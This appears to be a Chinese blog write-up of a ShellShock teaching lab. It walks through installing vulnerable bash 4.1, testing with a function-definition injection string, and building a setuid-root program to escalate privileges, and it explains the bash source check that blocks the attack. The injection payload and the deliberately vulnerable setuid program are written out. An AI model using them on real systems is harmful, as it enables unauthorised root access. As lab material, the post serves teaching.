首页 > 系统相关 >ShellShock 攻击实验

ShellShock 攻击实验

时间:2025-01-02 11:33:00浏览次数:6  
标签:bin index string 攻击 char 实验 ShellShock bash name

ShellShock 攻击实验

实验简介

2014年9月24日,Bash中发现了一个严重漏洞shellshock,该漏洞可用于许多系统,并且既可以远程也可以在本地触发。在本实验中,学生需要亲手重现攻击来理解该漏洞,并回答一些问题。

预备知识

什么是ShellShock?

Shellshock,又称Bashdoor,是在Unix中广泛使用的Bash shell中的一个安全漏洞,首次于2014年9月24日公开。许多互联网守护进程,如网页服务器,使用bash来处理某些命令,从而允许攻击者在易受攻击的Bash版本上执行任意代码。这可使攻击者在未授权的情况下访问计算机系统。——摘自维基百科

实验环境准备

环境搭建

以root权限安装4.1版bash(4.2版本以上的漏洞已经被堵上了) bash4.1 原来的下载地址是 http://ftp/gnu.org/gnu/bash/bash-4.1.tar.gz ,为了加快速度,我们这里使用下面的下载地址 http://labfile.oss.aliyuncs.com/bash-4.1.tar.gz

下载

$ sudo su
$ wget http://labfile.oss.aliyuncs.com/bash-4.1.tar.gz

安装

$ tar xf bash-4.1.tar.gz
$ cd bash-4.1
$ ./configure #这一步过程比较长,请等待一会
$ make && make install

13-1

链接

$ rm /bin/bash
$ ln -s /usr/local/bin/bash /bin/bash

13-2
到这里就安装完了,接下来检测是否存在shellshock漏洞。

$ exit
$ env x='() { :; }; echo vulnerable' bash -c "echo this is a test"

输出vulnerable的话,说明bash有漏洞。
13-3
最后,让/bin/sh 指向/bin/bash.
现在一切就绪,进入下一步吧。

预备知识

了解bash自定义函数,只需要函数名就能够调用该函数。

$ foo() { echo bar; } 
$ foo
> bar

这个时候的Bash的环境变量:

KEY = foo
VALUE = () { echo bar; }

来看看ShellShock漏洞的真身:

export foo='() { :; }; echo Hello World'
bash
>Hello World

为什么调用bash的时候输出Hello World了呢?瞧瞧他内部的情况:

KEY = foo
VALUE = () { :; }; echo Hello World

bash读取了环境变量,在定义foo之后直接调用了后面的函数。 一旦调用bash,自定义的语句就直接触发。

实验内容

本节将通过实践操作,带领大家亲手重现 shellshock 攻击来理解该漏洞。

攻击Set-UID程序

本实验中,我们通过攻击Set-UID程序来获得root权限。

我们知道system()函数将调用"/bin/sh -c" 来运行指定的命令, 这也意味着/bin/bash 会被调用,你能够利用shellshock漏洞来获取权限么? 首先,确保安装了带有漏洞的bash版本,并让/bin/sh 指向/bin/bash.

$ sudo ln -sf /bin/bash /bin/sh

在 /home/shiyanlou 目录下新建一个 shock.c 文件:

$ vi shock.c

输入以下内容:

#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>
void main()
{
    setuid(geteuid()); // make real uid = effective uid.
    system("/bin/ls -l");
}

13-4

编译这段代码,并设置其为Set-UID程序,保证它的所有者是root。

$ sudo su
$ gcc -o shock shock.c
$ chmod u+s shock
$ ls -il shock

13-5
我们注意到这里使用了setuid(geteuid()) 来使real uid = effective uid,这在Set-UID程序中不是普遍现象,但它确实有时会发生。 先自己试着hack一下:) 以下是hack过程:
13-6
如果 setuid(geteuid()) 语句被去掉了,再试试看攻击,我们还能够拿到权限么?

#include <stdio.h>
void main()
{
    system("/bin/ls -l");
}
$ sudo su
$ gcc -o sh0ck shock.c
$ chmod u+s sh0ck
$ ls -il sh0ck
$ exit
$ ./sh0ck

13-7
(hack过程与step1完全一样,sh0ck是编译后的程序)

失败了!这就说明如果 real uid 和 effective uid 相同的话,定义在环境变量中的内容在该程序内有效,那样shellshock漏洞就能够被利用了。但是如果两个 uid 不同的话,环境变量失效,就无法发动攻击了,这可以从 bash的源代码中得到印证(variables.c,在308到369行之间)请指出是哪一行导致了这样的不同,并说明bash这样设计的原因。

这里给出部分代码

/* Initialize the shell variables from the current environment.
   If PRIVMODE is nonzero, don't import functions from ENV or
   parse $SHELLOPTS. */
void
initialize_shell_variables (env, privmode)
     char **env;
     int privmode;
{
  char *name, *string, *temp_string;
  int c, char_index, string_index, string_length;
  SHELL_VAR *temp_var;

  create_variable_tables ();

  for (string_index = 0; string = env[string_index++]; )
    {

      char_index = 0;
      name = string;
      while ((c = *string++) && c != '=')
  ;
      if (string[-1] == '=')
  char_index = string - name - 1;

      /* If there are weird things in the environment, like `=xxx' or a
   string without an `=', just skip them. */
      if (char_index == 0)
  continue;

      /* ASSERT(name[char_index] == '=') */
      name[char_index] = '\0';
      /* Now, name = env variable name, string = env variable value, and
   char_index == strlen (name) */

      temp_var = (SHELL_VAR *)NULL;

      /* If exported function, define it now.  Don't import functions from
   the environment in privileged mode. */
      if (privmode == 0 && read_but_dont_execute == 0 && STREQN ("() {", string, 4))
  {
    string_length = strlen (string);
    temp_string = (char *)xmalloc (3 + string_length + char_index);

    strcpy (temp_string, name);
    temp_string[char_index] = ' ';
    strcpy (temp_string + char_index + 1, string);

    parse_and_execute (temp_string, name, SEVAL_NONINT|SEVAL_NOHIST);

    /* Ancient backwards compatibility.  Old versions of bash exported
       functions like name()=() {...} */
    if (name[char_index - 1] == ')' && name[char_index - 2] == '(')
      name[char_index - 2] = '\0';

    if (temp_var = find_function (name))
      {
        VSETATTR (temp_var, (att_exported|att_imported));
        array_needs_making = 1;
      }
    else
      report_error (_("error importing function definition for `%s'"), name);

    /* ( */
    if (name[char_index - 1] == ')' && name[char_index - 2] == '\0')
      name[char_index - 2] = '(';   /* ) */
  }

摘出其中关键部分并简化

void initialize_shell_variables(){
// 循环遍历所有环境变量
for (string_index = 0; string = env[string_index++]; ) {
     /*...*/
     /* 如果有export过的函数, 在这里定义 */
     /* 无法导入在特权模式下(root下)定义的函数 */
     if (privmode == 0 && read_but_dont_execute == 0 &&
           STREQN (“() {“, string, 4)) {
           [...]
           // 这里是shellshock发生的地方
           // 传递函数定义 + 运行额外的指令
           parse_and_execute (temp_string, name,
                SEVAL_NONINT|SEVAL_NOHIST);
[...]
} }

就是上述那一行判断逻辑导致了两者的不同,primode即私有模式,要求real uid 与 effective uid保持一致。

实验总结

ShellShock攻击实验不仅让我对Bash漏洞有了更深入的理解,也让我认识到了系统安全的重要性,注重安全意识的培养,在编程和系统管理中采取措施,以防范类似安全威胁。

标签:bin,index,string,攻击,char,实验,ShellShock,bash,name
From: https://www.cnblogs.com/Arisf/p/18647259

相关文章

  • 《DNK210使用指南 -CanMV版 V1.0》第四十八章 自学习分类实验
    第四十八章自学习分类实验1)实验平台:正点原子DNK210开发板2)章节摘自【正点原子】DNK210使用指南-CanMV版V1.03)购买链接:https://detail.tmall.com/item.htm?&id=7828013987504)全套实验源码+手册+视频下载地址:http://www.openedv.com/docs/boards/k210/ATK-DNK210.html5)正点......
  • 网站遭受攻击后的恢复与防护措施
    当您的网站不幸遭遇黑客攻击后,首要任务是尽快恢复正常运作,同时加强安全防护措施,防止类似事件重演。以下是详细的恢复步骤和预防建议:恢复阶段:清除残留威胁:除了删除已知的恶意代码外,还要仔细审查整个项目结构,查找隐藏的后门程序或可疑文件。可以借助专业的安全扫描工具进行全面......
  • 如何解决服务器被攻击后无法远程登录的问题?
    服务器遭受DDoS攻击后,无法通过远程桌面登录。以下是详细的恢复步骤和防御措施:创建服务器镜像:如果当前服务器无法立即恢复,建议首先创建服务器镜像。这样可以在迁移或升级过程中保留现有数据和配置。创建镜像后,将服务器升级到支持高防的电信机房(如MY-2集群),并单独购买DDoS防护......
  • 用仓颉完成编译原理实验-消除左递归和左公共因子,求FIRST集和FOLLOW集
    目录实验目的实验内容实现消去上下文无关文法中所有左递归的算法实现从上下文无关文法中提取左公共因子的算法实现求解上下文无关文法的FIRST集和FOLLOW集的算法设计方案与算法描述设计文法的数据结构实现消去上下文无关文法中所有左递归的算法实现从上下文无关文法中......
  • 用仓颉完成编译原理实验-正规式转NFA转DFA
    目录实验目的实验要求1.输入输出要求:2.算法要求:3.数据结构要求:算法描述正规式转NFA算法描述NFA转DFA算法描述测试结果实验随手记对仓颉的感受实验目的1.掌握正规表达式与有限自动机的基本概念和转换方法。2.了解非确定有限自动机(NFA)的构建过程。3.熟悉编......
  • 【开源免费】基于Vue和SpringBoot的中药实验管理系统(附论文)
    本文项目编号T130,文末自助获取源码\color{red}{T130,文末自助获取源码}......
  • 深入探究 CSRF 攻击:原理、危害与防范之道
    在当今数字化时代,网络应用程序的安全性至关重要。跨站请求伪造(Cross-SiteRequestForgery,CSRF)作为一种常见且具有潜在破坏力的网络攻击手段,威胁着各类网站和用户的安全与利益。从电子商务平台到社交媒体网站,从金融机构的在线服务到企业的内部管理系统,只要存在用户认证和交互的......
  • THU-rCore 操作系统实验日寄 -2
    THU-rCore操作系统实验踩坑日寄-2PART2第二章主要涉及单道的批处理和特权级的部分,尚不涉及多道程序设计。早先一直提到的RustSBI,实为一个Rust的riscvsupervisorbinaryinterface。若按中科院软件所维护的中文版RISC-VManual翻译,就应该作“RISC-V监管器(SuperVisor)二进......
  • 恶鬼实验1——freopen的告破1
    大家好,今天小编要开始在本专辑中充当几次“不要电脑的恶鬼”,给大家来观看几个实验。这次的实验是使用freopen中定向标注输入,但是实际并没有该路径,到底会怎样?接下来,我将为大家揭晓。来看源代码。#include<bits/stdc++.h>usingnamespacestd;intmain(){ inta=0; freo......
  • 内华达大地测量实验室gnss数据半自动化下载
    内华达大地测量实验室GNSS数据半自动化下载前言目的:继上篇GNSS时序形变位移数据下载,介绍了内华达网站GNSS位移数据如何手动交互进行下载。后面发现若自己需要下载很多站点的数据,我要通过手动一个个去点击下载不太方便。为此自己设计了一个根据站点名字文本文件进行批量下载tenv......